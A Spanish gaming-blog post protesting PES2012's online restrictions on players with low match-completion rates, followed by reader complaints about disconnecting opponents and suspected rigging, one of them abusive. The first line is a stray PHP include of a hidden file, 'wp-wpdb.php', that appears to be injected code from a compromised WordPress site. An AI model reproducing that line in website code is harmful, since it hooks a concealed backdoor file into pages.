if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Indignación en PES12 – La Fortaleza de LeChuck

Indignación en PES12

Saludos Lecuckeros. Como el propio título del artículo dice, indignado me hallo. Traigo un artículo serio de denuncia que espero que sea leído por todos los fans de la saga.

Os voy a contar mi historia. Siempre he sido aficionado al Pes2012 y siempre me ha entrado la curiosidad de como sería jugar online contra gente de todo el mundo. Un día cayó en mis manos este título deportivo y me puse como loco a jugar. Disfrutaba como un niño en los campeonatos y amistosos online.

Un día me invitaron a jugar en una comunidad en la cual se había organizado una liga. Quedé sorprendido de todo lo que te ofrece la interfaz del modo comunidad del Pes2012 y de todas las opciones en cuanto a ligas y torneos que te permitía organizar.


Cada vez me lo pasaba mejor, fui aprendiendo a jugar poco a poco después de un año de letargo en cuanto al Pro Evolution Soccer se refiere, hasta que el online comenzó a teñirse de un tinte oscuro. Cada vez eran más los partidos que no lograba acabar por culpa del contrario. Se caían o directamente se desconectaban por el mero hecho de ir perdiendo.

Aquí es donde entra la política de sanción a los «Tramposos». Cuando ganas por desconexión del rival te lo dan con 3 goles a favor y te suben el ranking como si hubieras ganado el partido de forma normal, pero también te bajan el porcentaje de partidos acabados. Cuando tus 10 últimos partidos o el total de partidos jugados es del 70% o menos aparece este mensaje.

Como podemos observar en la última restricción nos dice que será más fácil que nos emparejen con un jugador que tiene el porcentaje bajo de partidos acabados. Esto nos lleva a un bucle del que es difícil salir y muy fácil entrar.

Una solución sería jugar siempre con amigos pero ahora calculad el porcentaje de partidos jugados con amigos online versus jugados con desconocidos online, la proporción sigue siendo negativa.

Hay gente que defiende el sistema como una solución a la larga (muy a la larga para mi gusto). Si todos los que hacen «trampas» entran a ser jugadores restringidos mientras que tu puedes jugar con amigos y subir tu porcentaje de partidos acabados, llegará un momento en que todos los «tramposos» sean restringidos. Sinceramente esta solución no me parece la más adecuada.

Esta situación genera mucha molestia y quejas en los seguidores del título. Desde aquí me gustaría hacer un llamamiento a todos los jugadores que estén molestos con esta norma y que dejen su queja en los comentarios de la entrada. Ya son muchos los que han mandado su queja individual a Konami por medio de su página de Facebook sin recibir respuesta. Intentemos que nos lean y tomen nuestra opinión en cuenta.

Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

15 comentarios

  1. Hombre no quería influir negativamente en tus deseos de compra. Pero si empezar una campaña para que no se vuelva a repetir esto.

    Por lo contrario también te digo que no hay otro juego de fútbol con tantas opciones en el modo online ni en el modo comunidad con una interfaz que te permite hacer ligas y torneos con los amigos de una manera sencilla y prácticas.

  2. no lo compren en online decide quien gana konami,fallas goles solos sin portero apretas el boton de disparo no dispara,fueras de juegos k no son los pitan,no pitan penaltis penoso la verdad es denunciable cuando no quiere que no ganes no ganas y te jodes indignante vamos

  3. ami me pasa lo mismo, estoy restringuido culpa de los que se desconectan aveces hasta me han hecho perder casi todo un partido entero y lom peor es que estoy bloqueado, hay que hacer algo para los que jugamos limpio!!!

  4. el juego esta trucado.unos dias subo a 548 puntos y otro dia bajo a 400 por que suceden cosa estraña como qe los jugadores parecen que lleban plomo en los tobillos de lo pesaos que estan o que me tire el contrario desde lejos y el portero no la coje y es gol seguro.Señores de konami hay que hacer algo antes de que me coma el juego de la rabia

  5. Pues yo estoy hasta los huevos de los tramposos, por ejemplo:

    si tienen una falta cerca del area los muy HIJOS DE PUTA te colocan un jugador al lado de tu portero y cuando tiran la falta el portero no llega por que choca con el jugador que te han puesto ahi,hay que ser muy CERDO, TRAMPOSO Y MAL PARIDO para ganar de esa manera.

    Y piensas que konami ha arreglado ese fallo?

  6. en cuanto a lo de la falta se corrige facilmente, un amigo me enseño que para que el jugador que esta entre el portero y el poste no te pase nada debes poner al segundo jugador de la barrera, a mi me va bn asi, puesto que ese es el que normalmente no salta y por donde entran esos balones.

    Por otro lado quedan los hptas lagger, que si son un verdadero problema puesto que como dice el

  7. Realmente es una picardia mala, a los programadores y o inventores, deberan tomar recaudos, dada la evidente "mala intencion" de algunos jacker, como: reencasillar todo a cero tal vez reeincribirse nuevamente con otro nombre, gracias por la comprension.

Dejar un comentario